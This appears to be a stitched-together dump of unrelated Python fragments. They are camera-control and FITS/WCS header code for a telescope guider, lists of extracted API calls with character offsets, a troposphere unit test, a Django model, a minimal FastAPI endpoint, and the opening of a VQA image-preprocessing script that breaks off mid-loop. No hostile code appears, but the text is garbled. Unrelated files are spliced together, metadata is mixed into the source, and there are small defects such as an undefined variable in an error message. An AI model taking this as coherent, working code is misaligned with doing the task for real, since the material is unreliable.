# print("failed for " + str(genkey)+str(genval))
pass
elif typp == "int":
for genkey, genval in arvLst.items():
try:
cam.set_integer(genkey, genval)
except:
# probably a typo in the yaml file... todo: log this
# print("failed for " + str(genkey)+str(genval))
pass
elif typp == "float":
for genkey, genval in arvLst.items():
try:
cam.set_float(genkey, genval)
except:
# probably a typo in the yaml file... todo: log this
# print("failed for " + str(genkey)+str(genval))
pass
elif typp == "string":
for genkey, genval in arvLst.items():
try:
cam.set_string(genkey, genval)
except:
# probably a typo in the yaml file... todo: log this
# print("failed for " + str(genkey)+str(genval))
pass
dev = cam.get_device()
# Take full frames by default (maximizing probability of LVM guide camera
# to find guide stars in the field)
roiBounds = [-1, -1]
try:
roiBounds[0] = dev.get_integer_feature_value("WidthMax")
roiBounds[1] = dev.get_integer_feature_value("HeightMax")
# print(" ROI " + str(roiBounds[0]) + " x " + str(roiBounds[1]) )
cam.set_region(0, 0, roiBounds[0], roiBounds[1])
except Exception as ex:
# print("failed to set ROI " + str(ex))
pass
self.device = cam
self.regionBounds = roiBounds
@modules.atimeit
async def _disconnect_internal(self):
"""Close connection to camera."""
self.device = None
# @modules.atimeit
async def _expose_grabFrame(self, exposure):
"""Read a single unbinned full frame.
The class splits the parent class' exposure into this function and
the part which generates the FITS file, because applications in guiders
are usually only interested in the frame's data, and would not
take the detour of generating a FITS file and reading it back from
disk.
        :param exposure: On entry, exposure.exptime is the intended exposure time in [sec]
On exit, exposure.data is the numpy array of the 16bit data
arranged in FITS order (i.e., the data of the bottom row appear first...)
:return: The dictionary with the window location and size (x=,y=,width=,height=)
"""
# To avoid being left over by other programs with no change
# to set the exposure time, we switch the auto=0=off first
self.device.set_exposure_time_auto(0)
        # Aravis expects the exposure time as an integer number of microseconds
        exptime_us = int(0.5 + exposure.exptime * 1e6)
        self.device.set_exposure_time(exptime_us)
# timeout (factor 2: assuming there may be two frames in auto mode taken
# internally)
# And 5 seconds margin for any sort of transmission overhead over PoE
        tout_us = int(1.0e6 * (2.0 * exposure.exptime + 5))
self.notify(CameraEvent.EXPOSURE_INTEGRATING)
# the buffer allocated/created within the acquisition()
        buf = await self.loop.run_in_executor(None, self.device.acquisition, tout_us)
if buf is None:
raise ExposureError(
"Exposing for "
+ str(exposure.exptime)
+ " sec failed. Timout "
+ str(tout_ms / 1.0e6)
)
# Decipher which methods this aravis buffer has...
# print(dir(buf))
# reg becomes a x=, y=, width= height= dictionary
# these are in standard X11 coordinates where upper left =(0,0)
reg = buf.get_image_region()
# print('region',reg)
data = buf.get_data()
exposure.data = numpy.ndarray(
buffer=data, dtype=numpy.uint16, shape=(1, reg.height, reg.width)
)
# print("exposure data shape", exposure.data.shape)
return reg
@modules.atimeit
async def _expose_internal(self, exposure):
"""Read a single unbinned full frame and store in a FITS file.
        :param exposure: On entry exposure.exptime is the intended exposure time in [sec]
On exit, exposure.data contains the 16bit data of a single frame
:return: There is no return value
"""
# fill exposure.data with the frame's 16bit data
# reg becomes a x=, y=, width= height= dictionary
# these are in standard X11 coordinates where upper left =(0,0)
reg = await self._expose_grabFrame(exposure)
# print('region',reg)
binxy = {}
try:
# becomes a dictionary with dx=... dy=... for the 2 horiz/vert binn fact
binxy = self.device.get_binning()
except Exception as ex:
binxy = None
# append FITS header cards
# For the x/y coordinates transform from X11 to FITS coordinates
        # Todo: does the camera report a y-flipped reg.y if ReverseY=true above?
addHeaders = [
("BinX", binxy.dx, "[ct] Horizontal Bin Factor 1, 2 or 4"),
("BinY", binxy.dy, "[ct] Vertical Bin Factor 1, 2 or 4"),
("Width", reg.width, "[ct] Pixel Columns"),
("Height", reg.height, "[ct] Pixel Rows"),
("RegX", 1 + reg.x, "[ct] Pixel Region Horiz start"),
# The lower left FITS corner is the upper left X11 corner...
(
"RegY",
self.regionBounds[1] - (reg.y + reg.height - 1),
"[ct] Pixel Region Vert start",
),
]
dev = self.device.get_device()
# print(dir(dev))
# print(dir(self))
# print(self.camera_system.get_camera(self.name))
# print(self.camera_system._config[self.name])
try:
gain = dev.get_float_feature_value("Gain")
addHeaders.append(("Gain", gain, "Gain"))
except Exception as ex:
# print("failed to read gain" + str(ex))
pass
imgrev = [False, False]
try:
imgrev[0] = self.device.get_boolean("ReverseX")
addHeaders.append(("ReverseX", imgrev[0] != 0, " Flipped left-right"))
imgrev[1] = self.device.get_boolean("ReverseY")
addHeaders.append(("ReverseY", imgrev[1] != 0, " Flipped up-down"))
# print("reversed" + str(imgrev[0]) + str(imgrev[1]) )
except Exception as ex:
# print("failed to read ReversXY" + str(ex))
pass
# This is an enumeration in the GenICam. See features list of
# `arv-tool-0.8 --address=192.168.70.50 features`
binMod = [-1, -1]
try:
binMod[0] = dev.get_integer_feature_value("BinningHorizontalMode")
if binMod[0] == 0:
addHeaders.append(
("BinModeX", "Averag", "Horiz Bin Mode Sum or Averag")
)
else:
addHeaders.append(("BinModeX", "Sum", "Horiz Bin Mode Sum or Averag"))
binMod[1] = dev.get_integer_feature_value("BinningVerticalMode")
if binMod[1] == 0:
addHeaders.append(("BinModeY", "Averag", "Vert Bin Mode Sum or Averag"))
else:
addHeaders.append(("BinModeY", "Sum", "Vert Bin Mode Sum or Averag"))
except Exception as ex:
# print("failed to read binmode" + str(ex))
pass
tmp = False
try:
tmp = self.device.get_boolean("BlackLevelClampingEnable")
addHeaders.append(
("CAMBLCLM", tmp != 0, "Black Level Clamping en/disabled")
)
# print("BlackLevelClampingEnable" + str(imgrev[0]) + str(imgrev[1]) )
except Exception as ex:
# print("failed to read BlackLevelClampingEnable" + str(ex))
pass
try:
camtyp = self.device.get_model_name()
addHeaders.append(("CAMTYP", camtyp, "Camera model"))
except:
pass
# call _expose_wcs() to gather WCS header keywords
addHeaders.extend(self._expose_wcs(exposure, reg))
# for headr in addHeaders:
# exposure.fits_model[0].header_model.append(models.Card(headr))
self.header = addHeaders
# print(repr(exposure.to_hdu()[0].header))
# unref() is currently usupported in this GObject library.
# Hope that this does not lead to any memory leak....
# buf.unref()
return
# @modules.timeit
def _expose_wcs(self, exposure, reg):
"""Gather information for the WCS FITS keywords
        :param exposure: On entry exposure.exptime is the intended exposure time in [sec]
On exit, exposure.data contains the 16bit data of a single frame
:param reg The binning and region information
"""
# the section/dictionary of the yaml file for this camera
yamlconfig = self.camera_system._config[self.name]
wcsHeaders = []
# The distance from the long edge of the FLIR camera to the center
# of the focus (fiber) is 7.144+4.0 mm according to SDSS-V_0110 figure 6
# and 11.14471 according to figure 3-1 of LVMi-0081
# For the *w or *e cameras the pixel row 1 (in FITS) is that far
# away in the y-coordinate and in the middle of the x-coordinate.
# For the *c cameras at the fiber bundle we assume them to be in the beam center.
wcsHeaders.append(("CRPIX1", reg.width / 2, "[px] RA center along axis 1"))
if self.name[-1] == "c":
wcsHeaders.append(
("CRPIX2", reg.height / 2, "[px] DEC center along axis 2")
)
else:
# convert 11.14471 mm to microns and to to pixels
crefy = 11.14471 * 1000.0 / yamlconfig["pixsize"]
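            # e.g., with a hypothetical 9 um pixel size: 11144.71 / 9 ~ 1238 px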
wcsHeaders.append(("CRPIX2", -crefy, "[px] DEC center along axis 2"))
return wcsHeaders
class BlackflyImageAreaMixIn(ImageAreaMixIn):
"""Allows to select image region and binning factors"""
async def _get_image_area_internal(self):
pass
async def _set_image_area_internal(self, area=None):
pass
async def _get_binning_internal(self):
pass
async def _set_binning_internal(self, hbin, vbin):
pass
# async def singleFrame(
# exptim,
# name,
# verb=False,
# ip_add=None,
# config="cameras.yaml",
# targ=None,
# kmirr=0.0,
# flen=None,
# ):
# """Expose once and write the image to a FITS file.
# :param exptim: The exposure time in seconds. Non-negative.
# :type exptim: float
# :param verb: Verbosity on or off
# :type verb: boolean
# :param ip_add: list of explicit IP's (like 192.168.70.51 or lvmt.irws2.mpia.de)
# :type ip_add: list of strings
# :param config: Name of the YAML file with the cameras configuration
# :type config: string of the file name
# :param targ: alpha/delta ra/dec of the sidereal target
# :type targ: astropy.coordinates.SkyCoord
# :param kmirr: Kmirr angle in degrees (0 if up, positive with right hand rule along North on bench)
# :type kmirr: float
# :param flen: focal length of telescope/siderostat in mm
# If not provided it will be taken from the configuration file
# :type flen: float
# """
# cs = BlackflyCameraSystem(
# BlackflyCamera, camera_config=config, verbose=verb, ip_list=ip_add
# )
# cam = await cs.add_camera(name=name)
# # print("cameras", cs.cameras)
# # print("config" ,config)
# exp = await cam.expose(exptim, "LAB TEST")
# if targ is not None and kmirr is not None:
# # if there is already a (partial) header information, keep it,
# # otherwise create one ab ovo.
# if exp.wcs is None:
# wcshdr = astropy.io.fits.Header()
# else:
# wcshdr = exp.wcs.to_header()
# key = astropy.io.fits.Card("CUNIT1", "deg", "WCS units along axis 1")
# wcshdr.append(key)
# key = astropy.io.fits.Card("CUNIT2", "deg", "WCS units along axis 2")
# wcshdr.append(key)
# key = astropy.io.fits.Card("CTYPE1", "RA---TAN", "WCS type axis 1")
# wcshdr.append(key)
# key = astropy.io.fits.Card("CTYPE2", "DEC--TAN", "WCS type axis 2")
# wcshdr.append(key)
# key = astropy.io.fits.Card("CRVAL1", targ.ra.deg, "[deg] RA at reference pixel")
# wcshdr.append(key)
# key = astropy.io.fits.Card(
# "CRVAL2", targ.dec.deg, "[deg] DEC at reference pixel"
# )
# wcshdr.append(key)
# # field angle: degrees, then radians
# # direction of NCP on the detectors (where we have already flipped pixels
# # on all detectors so fieldrot=kmirr=0 implies North is up and East is left)
# # With right-handed-rule: zero if N=up (y-axis), 90 deg if N=right (x-axis)
# # so the direction is the vector ( sin(f), cos(f)) before the K-mirror.
# # Action of K-mirror is ( cos(2*m), sin(2*m); sin(2*m), -cos(2*m))
# # and action of prism is (-1 0 ; 0 1), i.e. to flip the horizontal coordinate.
# # todo: get starting value from a siderostat field rotation tracking model
# fieldrot = 0.0
# if name[-1] == "c":
# # without prism, assuming center camera placed horizontally
# if name[:4] == "spec":
# # without K-mirror
# pass
# else:
# # with K-mirror
# # in the configuration the y-axis of the image has been flipped,
# # the combined action of (1, 0; 0, -1) and the K-mirror is (cos(2m), sin(2m); -sin(2m), cos(2m))
# # and applied to the input vector this is (sin(2m+f), cos(2m+f))
# fieldrot += 2.0 * kmirr
# else:
# # with prism
# if name[:4] == "spec":
# # without K-mirror
# # Applied to input beam this gives (-sin(f), cos(f)) but prism effect
# # had been undone by vertical flip in the FLIR image.
# pass
# else:
# # with K-mirror
# # Combined action of K-mirror and prism is (-cos(2*m), -sin(2*m);sin(2*m), -cos(2*m)).
# # Applied to input beam this gives (-sin(2*m+f), -cos(2*m+f)) = (sin(2*m+f+pi), cos(2*m+f+pi)).
# fieldrot += 2.0 * kmirr + 180.0
# if name[-1] == "w":
# # Camera is vertically,
# # so up in the lab is right in the image
# fieldrot += 90
# else:
# # Camera is vertically,
# # so up in the lab is left in the image
# fieldrot -= 90
# fieldrot = math.radians(fieldrot)
# # the section/dictionary of the yaml file for this camera
# yamlconfig = cs._config[name]
# if flen is None:
# flen = yamlconfig["flen"]
# # pixel scale per arcseconds is focal length *pi/180 /3600
# # = flen * mm *pi/180 /3600
# # = flen * um *pi/180 /3.6, so in microns per arcsec...
# pixscal = math.radians(flen) / 3.6
# # degrees per pixel is arcseconds per pixel/3600 = (mu/pix)/(mu/arcsec)/3600
# degperpix = yamlconfig["pixsize"] / pixscal / 3600.0
# # for the right handed coordinates
# # (pixx,pixy) = (cos f', -sin f'; sin f', cos f')*(DEC,RA) where f' =90deg -fieldrot
# # (pixx,pixy) = (sin f, -cos f; cos f , sin f)*(DEC,RA)
# # (sin f, cos f; -cos f, sin f)*(pixx,pixy) = (DEC,RA)
# # (-cos f, sin f; sin f, cos f)*(pixx,pixy) = (RA,DEC)
#     # Note that the det of the WCS matrix is negative (because RA/DEC is left-handed...)
# cosperpix = degperpix * math.cos(fieldrot)
# sinperpix = degperpix * math.sin(fieldrot)
# key = astropy.io.fits.Card("CD1_1", -cosperpix, "[deg/px] WCS matrix diagonal")
# wcshdr.append(key)
# key = astropy.io.fits.Card("CD2_2", cosperpix, "[deg/px] WCS matrix diagonal")
# wcshdr.append(key)
# key = astropy.io.fits.Card(
# "CD1_2", sinperpix, "[deg/px] WCS matrix outer diagonal"
# )
# wcshdr.append(key)
# key = astropy.io.fits.Card(
# "CD2_1", sinperpix, "[deg/px] WCS matrix outer diagonal"
# )
# wcshdr.append(key)
# exp.wcs = astropy.wcs.WCS(wcshdr)
# # print(exp.wcs.to_header_string())
# for headr in wcshdr.cards:
# exp.fits_model[0].header_model.append(models.Card(headr))
# await exp.write()
# if verb:
# print("wrote ", exp.filename)
# # A debugging aid, demonstrator and simple test run
# # This allows to call this file as an executable from the command line.
# # The last command line argument must be the name of the camera
# # as used in the configuration file.
# # Example
# # BlackflyCam.py [-e seconds] [-v] [-c ../etc/cameras.yaml] [-r 2h10m10s] [-d -20d10m3s]
# # [-K kmirrdegrees] [-s "LCO"|"MPIA"|"APO"|"KHU"] [-f focallengthmm] {spec.age|spec.agw|...}
# if __name__ == "__main__":
# import argparse
# parser = argparse.ArgumentParser()
# parser.add_argument(
# "-e",
# "--exptime",
# type=float,
# default=5.0,
# help="Expose for for exptime seconds",
# )
# parser.add_argument(
# "-v", "--verbose", action="store_true", help="print some notes to stdout"
# )
# # With the -i switch we can add an explicit IP-Adress for a
# # camera if we want to read a camera that is not reachable
# # by the broadcast scanner.
# parser.add_argument("-i", "--ip", help="IP address of camera")
# # Name of an optional YAML file
# parser.add_argument(
# "-c", "--cfg", default="cameras.yaml", help="YAML file of lvmt cameras"
# )
# # right ascension in degrees
# parser.add_argument("-r", "--ra", help="RA J2000 in degrees or in xxhxxmxxs format")
# # declination in degrees
# parser.add_argument(
# "-d", "--dec", help="DEC J2000 in degrees or in +-xxdxxmxxs format"
# )
# # K-mirror angle in degrees
# # Note this is only relevant for 3 of the 4 tables/telescopes
# parser.add_argument("-K", "--Kmirr", type=float, help="K-mirror angle in degrees")
# # focal length of telescope in mm
# # Default is the LCO triple lens configuration of 1.8 meters
# parser.add_argument(
# "-f", "--flen", type=float, default=1839.8, help="focal length in mm"
# )
# # shortcut for site coordinates: observatory
# # parser.add_argument("-s", '--site', default="LCO", help="LCO or MPIA or APO or KHU")
# # the last argument is mandatory: must be the name of exactly one camera
# # as used in the configuration file
# parser.add_argument("camname", default="sci.agw")
# args = parser.parse_args()
# ip_cmdLine = []
# if args.ip is not None:
# ip_cmdLine.append(args.ip)
# # check ranges and combine ra/dec into a single SkyCoord
# if args.ra is not None and args.dec is not None:
# if args.ra.find("h") < 0:
# # apparently simple floating point representation
# targ = astropy.coordinates.SkyCoord(
# ra=float(args.ra), dec=float(args.dec), unit="deg"
# )
# else:
# targ = astropy.coordinates.SkyCoord(args.ra + " " + args.dec)
# else:
# targ = None
# # print(targ)
# # The following 2 lines test that listing the connected cameras works...
# # bsys = BlackflyCameraSystem(camera_class=BlackflyCamera)
# # bsys.list_available_cameras()
# asyncio.run(
# singleFrame(
# args.exptime,
# args.camname,
# verb=args.verbose,
# ip_add=ip_cmdLine,
# config=args.cfg,
# targ=targ,
# kmirr=args.Kmirr,
# flen=args.flen,
# )
# )
class WcsHdrCards(card.MacroCard):
    def macro(self, exposure, context={}):
        wcshdr = get_wcshdr(
            modules.variables.cs_list[0],
            modules.variables.camname,
            modules.variables.targ,
            modules.variables.kmirr,
            modules.variables.flen,
        )
        return wcshdr
# @modules.timeit
def get_wcshdr(
cs,
name,
targ,
kmirr,
flen,
):
if targ is not None and kmirr is not None:
# wcshdr = astropy.io.fits.Header()
wcshdr = []
key = astropy.io.fits.Card("CUNIT1", "deg", "WCS units along axis 1")
wcshdr.append(key)
key = astropy.io.fits.Card("CUNIT2", "deg", "WCS units along axis 2")
wcshdr.append(key)
key = astropy.io.fits.Card("CTYPE1", "RA---TAN", "WCS type axis 1")
wcshdr.append(key)
key = astropy.io.fits.Card("CTYPE2", "DEC--TAN", "WCS type axis 2")
wcshdr.append(key)
key = astropy.io.fits.Card("CRVAL1", targ.ra.deg, "[deg] RA at reference pixel")
wcshdr.append(key)
key = astropy.io.fits.Card(
"CRVAL2", targ.dec.deg, "[deg] DEC at reference pixel"
)
wcshdr.append(key)
# field angle: degrees, then radians
# direction of NCP on the detectors (where we have already flipped pixels
# on all detectors so fieldrot=kmirr=0 implies North is up and East is left)
# With right-handed-rule: zero if N=up (y-axis), 90 deg if N=right (x-axis)
# so the direction is the vector ( sin(f), cos(f)) before the K-mirror.
# Action of K-mirror is ( cos(2*m), sin(2*m); sin(2*m), -cos(2*m))
# and action of prism is (-1 0 ; 0 1), i.e. to flip the horizontal coordinate.
# todo: get starting value from a siderostat field rotation tracking model
fieldrot = 0.0
if name[-1] == "c":
# without prism, assuming center camera placed horizontally
if name[:4] == "spec":
# without K-mirror
pass
else:
# with K-mirror
# in the configuration the y-axis of the image has been flipped,
# the combined action of (1, 0; 0, -1) and the K-mirror is (cos(2m), sin(2m); -sin(2m), cos(2m))
# and applied to the input vector this is (sin(2m+f), cos(2m+f))
fieldrot += 2.0 * kmirr
else:
# with prism
if name[:4] == "spec":
# without K-mirror
# Applied to input beam this gives (-sin(f), cos(f)) but prism effect
# had been undone by vertical flip in the FLIR image.
pass
else:
# with K-mirror
# Combined action of K-mirror and prism is (-cos(2*m), -sin(2*m);sin(2*m), -cos(2*m)).
# Applied to input beam this gives (-sin(2*m+f), -cos(2*m+f)) = (sin(2*m+f+pi), cos(2*m+f+pi)).
fieldrot += 2.0 * kmirr + 180.0
if name[-1] == "w":
# Camera is vertically,
# so up in the lab is right in the image
fieldrot += 90
else:
# Camera is vertically,
# so up in the lab is left in the image
fieldrot -= 90
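        # Worked example (illustrative): a "w" camera behind prism and K-mirror
        # at kmirr = 10 deg accumulates fieldrot = 2*10 + 180 + 90 = 290 deg.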
fieldrot = math.radians(fieldrot)
# the section/dictionary of the yaml file for this camera
yamlconfig = cs._config[name]
if flen is None:
flen = yamlconfig["flen"]
# pixel scale per arcseconds is focal length *pi/180 /3600
# = flen * mm *pi/180 /3600
# = flen * um *pi/180 /3.6, so in microns per arcsec...
pixscal = math.radians(flen) / 3.6
# degrees per pixel is arcseconds per pixel/3600 = (mu/pix)/(mu/arcsec)/3600
degperpix = yamlconfig["pixsize"] / pixscal / 3600.0
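        # Worked example (illustrative): flen = 1839.8 mm and a hypothetical
        # 9 um pixel give pixscal = radians(1839.8) / 3.6 ~ 8.92 um/arcsec,
        # i.e. degperpix = 9 / 8.92 / 3600 ~ 2.8e-4 deg/px (about 1.0 arcsec/px).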
# for the right handed coordinates
# (pixx,pixy) = (cos f', -sin f'; sin f', cos f')*(DEC,RA) where f' =90deg -fieldrot
# (pixx,pixy) = (sin f, -cos f; cos f , sin f)*(DEC,RA)
# (sin f, cos f; -cos f, sin f)*(pixx,pixy) = (DEC,RA)
# (-cos f, sin f; sin f, cos f)*(pixx,pixy) = (RA,DEC)
        # Note that the determinant of the WCS matrix is negative (because RA/DEC is left-handed...)
cosperpix = degperpix * math.cos(fieldrot)
sinperpix = degperpix * math.sin(fieldrot)
key = astropy.io.fits.Card("CD1_1", -cosperpix, "[deg/px] WCS matrix diagonal")
wcshdr.append(key)
key = astropy.io.fits.Card("CD2_2", cosperpix, "[deg/px] WCS matrix diagonal")
wcshdr.append(key)
key = astropy.io.fits.Card(
"CD1_2", sinperpix, "[deg/px] WCS matrix outer diagonal"
)
wcshdr.append(key)
key = astropy.io.fits.Card(
"CD2_1", sinperpix, "[deg/px] WCS matrix outer diagonal"
)
wcshdr.append(key)
return wcshdr
else:
return None
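# Example (illustrative; the coordinates are arbitrary, flen is the LCO default):
#   targ = astropy.coordinates.SkyCoord(ra=230.5, dec=-20.2, unit="deg")
#   cards = get_wcshdr(cs, "sci.agw", targ, kmirr=0.0, flen=1839.8)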
|
[
"basecam.CameraConnectionError",
"math.radians",
"lvmcam.araviscam.aravis.Aravis.update_device_list",
"lvmcam.araviscam.aravis.Aravis.get_device_id",
"math.sin",
"math.cos",
"lvmcam.araviscam.aravis.Aravis.get_n_devices",
"astropy.io.fits.Card",
"numpy.ndarray",
"lvmcam.araviscam.aravis.Aravis.Camera.new"
] |
[((4241, 4268), 'lvmcam.araviscam.aravis.Aravis.update_device_list', 'Aravis.update_device_list', ([], {}), '()\n', (4266, 4268), False, 'from lvmcam.araviscam.aravis import Aravis\n'), ((4284, 4306), 'lvmcam.araviscam.aravis.Aravis.get_n_devices', 'Aravis.get_n_devices', ([], {}), '()\n', (4304, 4306), False, 'from lvmcam.araviscam.aravis import Aravis\n'), ((14024, 14109), 'numpy.ndarray', 'numpy.ndarray', ([], {'buffer': 'data', 'dtype': 'numpy.uint16', 'shape': '(1, reg.height, reg.width)'}), '(buffer=data, dtype=numpy.uint16, shape=(1, reg.height, reg.width)\n    )\n', (14037, 14109), False, 'import numpy\n'), ((30853, 30916), 'astropy.io.fits.Card', 'astropy.io.fits.Card', (['"""CUNIT1"""', '"""deg"""', '"""WCS units along axis 1"""'], {}), "('CUNIT1', 'deg', 'WCS units along axis 1')\n", (30873, 30916), False, 'import astropy\n'), ((30958, 31021), 'astropy.io.fits.Card', 'astropy.io.fits.Card', (['"""CUNIT2"""', '"""deg"""', '"""WCS units along axis 2"""'], {}), "('CUNIT2', 'deg', 'WCS units along axis 2')\n", (30978, 31021), False, 'import astropy\n'), ((31063, 31124), 'astropy.io.fits.Card', 'astropy.io.fits.Card', (['"""CTYPE1"""', '"""RA---TAN"""', '"""WCS type axis 1"""'], {}), "('CTYPE1', 'RA---TAN', 'WCS type axis 1')\n", (31083, 31124), False, 'import astropy\n'), ((31166, 31227), 'astropy.io.fits.Card', 'astropy.io.fits.Card', (['"""CTYPE2"""', '"""DEC--TAN"""', '"""WCS type axis 2"""'], {}), "('CTYPE2', 'DEC--TAN', 'WCS type axis 2')\n", (31186, 31227), False, 'import astropy\n'), ((31269, 31343), 'astropy.io.fits.Card', 'astropy.io.fits.Card', (['"""CRVAL1"""', 'targ.ra.deg', '"""[deg] RA at reference pixel"""'], {}), "('CRVAL1', targ.ra.deg, '[deg] RA at reference pixel')\n", (31289, 31343), False, 'import astropy\n'), ((31385, 31461), 'astropy.io.fits.Card', 'astropy.io.fits.Card', (['"""CRVAL2"""', 'targ.dec.deg', '"""[deg] DEC at reference pixel"""'], {}), "('CRVAL2', targ.dec.deg, '[deg] DEC at reference pixel')\n", (31405, 31461), False, 'import astropy\n'), ((33639, 33661), 'math.radians', 'math.radians', (['fieldrot'], {}), '(fieldrot)\n', (33651, 33661), False, 'import math\n'), ((34724, 34797), 'astropy.io.fits.Card', 'astropy.io.fits.Card', (['"""CD1_1"""', '(-cosperpix)', '"""[deg/px] WCS matrix diagonal"""'], {}), "('CD1_1', -cosperpix, '[deg/px] WCS matrix diagonal')\n", (34744, 34797), False, 'import astropy\n'), ((34839, 34911), 'astropy.io.fits.Card', 'astropy.io.fits.Card', (['"""CD2_2"""', 'cosperpix', '"""[deg/px] WCS matrix diagonal"""'], {}), "('CD2_2', cosperpix, '[deg/px] WCS matrix diagonal')\n", (34859, 34911), False, 'import astropy\n'), ((34953, 35031), 'astropy.io.fits.Card', 'astropy.io.fits.Card', (['"""CD1_2"""', 'sinperpix', '"""[deg/px] WCS matrix outer diagonal"""'], {}), "('CD1_2', sinperpix, '[deg/px] WCS matrix outer diagonal')\n", (34973, 35031), False, 'import astropy\n'), ((35095, 35173), 'astropy.io.fits.Card', 'astropy.io.fits.Card', (['"""CD2_1"""', 'sinperpix', '"""[deg/px] WCS matrix outer diagonal"""'], {}), "('CD2_1', sinperpix, '[deg/px] WCS matrix outer diagonal')\n", (35115, 35173), False, 'import astropy\n'), ((34017, 34035), 'math.radians', 'math.radians', (['flen'], {}), '(flen)\n', (34029, 34035), False, 'import math\n'), ((34640, 34658), 'math.cos', 'math.cos', (['fieldrot'], {}), '(fieldrot)\n', (34648, 34658), False, 'import math\n'), ((34691, 34709), 'math.sin', 'math.sin', (['fieldrot'], {}), '(fieldrot)\n', (34699, 34709), False, 'import math\n'), ((4483, 4506), 'lvmcam.araviscam.aravis.Aravis.get_device_id', 'Aravis.get_device_id', (['i'], {}), '(i)\n', (4503, 4506), False, 'from lvmcam.araviscam.aravis import Aravis\n'), ((4765, 4786), 'lvmcam.araviscam.aravis.Aravis.Camera.new', 'Aravis.Camera.new', (['ip'], {}), '(ip)\n', (4782, 4786), False, 'from lvmcam.araviscam.aravis import Aravis\n'), ((7761, 7814), 'basecam.CameraConnectionError', 'CameraConnectionError', (["('SN ' + uid + ' not connected')"], {}), "('SN ' + uid + ' not connected')\n", (7782, 7814), False, 'from basecam import CameraSystem, BaseCamera, CameraEvent, CameraConnectionError, models, ExposureError\n'), ((8218, 8257), 'basecam.CameraConnectionError', 'CameraConnectionError', (['""" not connected"""'], {}), "(' not connected')\n", (8239, 8257), False, 'from basecam import CameraSystem, BaseCamera, CameraEvent, CameraConnectionError, models, ExposureError\n'), ((8157, 8182), 'lvmcam.araviscam.aravis.Aravis.get_device_id', 'Aravis.get_device_id', (['idx'], {}), '(idx)\n', (8177, 8182), False, 'from lvmcam.araviscam.aravis import Aravis\n')]
|
import unittest
from troposphere import Parameter, Ref
class TestInitArguments(unittest.TestCase):
def test_title_max_length(self):
title = "i" * 256
with self.assertRaises(ValueError):
Parameter(title, Type="String")
def test_ref_can_be_requested(self):
param = Parameter("title", Type="String")
reference = param.ref()
self.assertIsInstance(reference, Ref)
self.assertDictEqual(reference.data, {"Ref": "title"})
if __name__ == "__main__":
unittest.main()
|
[
"unittest.main",
"troposphere.Parameter"
] |
[((520, 535), 'unittest.main', 'unittest.main', ([], {}), '()\n', (533, 535), False, 'import unittest\n'), ((311, 344), 'troposphere.Parameter', 'Parameter', (['"""title"""'], {'Type': '"""String"""'}), "('title', Type='String')\n", (320, 344), False, 'from troposphere import Parameter, Ref\n'), ((221, 252), 'troposphere.Parameter', 'Parameter', (['title'], {'Type': '"""String"""'}), "(title, Type='String')\n", (230, 252), False, 'from troposphere import Parameter, Ref\n')]
|
from django.db import models
from .Auditable import Auditable
from .Credential import Credential
class Name(Auditable):
reindex_related = ['credential']
credential = models.ForeignKey(Credential, related_name="names", on_delete=models.CASCADE)
text = models.TextField(null=True)
language = models.TextField(null=True)
class Meta:
db_table = "name"
ordering = ('id',)
|
[
"django.db.models.ForeignKey",
"django.db.models.TextField"
] |
[((179, 256), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Credential'], {'related_name': '"""names"""', 'on_delete': 'models.CASCADE'}), "(Credential, related_name='names', on_delete=models.CASCADE)\n", (196, 256), False, 'from django.db import models\n'), ((268, 295), 'django.db.models.TextField', 'models.TextField', ([], {'null': '(True)'}), '(null=True)\n', (284, 295), False, 'from django.db import models\n'), ((311, 338), 'django.db.models.TextField', 'models.TextField', ([], {'null': '(True)'}), '(null=True)\n', (327, 338), False, 'from django.db import models\n')]
|
from typing import Optional

from fastapi import FastAPI, Request
from fastapi.middleware.cors import CORSMiddleware
from pydantic import BaseModel

class Input(BaseModel):
    method: str
    params: dict = {}
    locale: str = 'en'
    # explicit Optional: a bare `str = None` annotation breaks under pydantic v2
    token: Optional[str] = None
app = FastAPI(title='Web app API')
app.add_middleware(
CORSMiddleware,
allow_origins=["*"],
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
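# Note: per the CORS spec, browsers reject credentialed responses when
# Access-Control-Allow-Origin is the literal "*"; list explicit origins
# if cookies or Authorization headers must be sent cross-origin.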
@app.post('/')
async def api(data: Input, request: Request):
print(data, request.client.host, request.client.port)
return {'error': 0, 'result': {'data': 'result'}}
if __name__ == '__main__':
import uvicorn
uvicorn.run('app:app', host='0.0.0.0', port=5000, reload=True)
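# Example request (illustrative; the method name "ping" is arbitrary):
#   curl -X POST http://localhost:5000/ \
#        -H 'Content-Type: application/json' \
#        -d '{"method": "ping", "params": {}, "locale": "en"}'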
|
[
"uvicorn.run",
"fastapi.FastAPI"
] |
[((224, 252), 'fastapi.FastAPI', 'FastAPI', ([], {'title': '"""Web app API"""'}), "(title='Web app API')\n", (231, 252), False, 'from fastapi import FastAPI, Request\n'), ((620, 682), 'uvicorn.run', 'uvicorn.run', (['"""app:app"""'], {'host': '"""0.0.0.0"""', 'port': '(5000)', 'reload': '(True)'}), "('app:app', host='0.0.0.0', port=5000, reload=True)\n", (631, 682), False, 'import uvicorn\n')]
|
import json
from collections import Counter
import re
from VQA.PythonHelperTools.vqaTools.vqa import VQA
import random
import numpy as np
from keras.preprocessing.image import load_img, img_to_array, ImageDataGenerator
from matplotlib import pyplot as plt
import os
import VQAModel
from keras.applications.xception import decode_predictions, preprocess_input
# from keras.applications.inception_v3 import decode_predictions, preprocess_input
from PIL import Image, ImageOps
import math
from Environment import DATADIR
versionType = 'v2_' # this should be '' when using VQA v2.0 dataset
taskType = 'OpenEnded' # 'OpenEnded' only for v2.0. 'OpenEnded' or 'MultipleChoice' for v1.0
dataType = 'mscoco' # 'mscoco' only for v1.0. 'mscoco' for real and 'abstract_v002' for abstract for v1.0.
dataSubType = 'train2014'
saveDir = 'preprocessed_xcep_24'
annFile = '%s/Annotations/%s%s_%s_annotations.json' % (DATADIR, versionType, dataType, dataSubType)
quesFile = '%s/Questions/%s%s_%s_%s_questions.json' % (DATADIR, versionType, taskType, dataType, dataSubType)
imgDir = '%s/Images/%s/' % (DATADIR, dataSubType)
i = 0
directory = os.fsencode(imgDir)
# 363, 555
# 427, 619
size1 = 299 + 64  # presumably a 64 px margin over Xception's native 299 px input
size2 = 299 + 64
model = VQAModel.createModelXception((size1, size2, 3))
model.summary()
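# First pass: landscape images (width >= height).  A second pass below, with
# the model input dimensions swapped, handles portrait images; each image's
# Xception features are saved as a 24x2048 array named after its COCO id.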
for file in os.listdir(directory):
filename = os.fsdecode(file)
if filename.endswith(".jpg"):
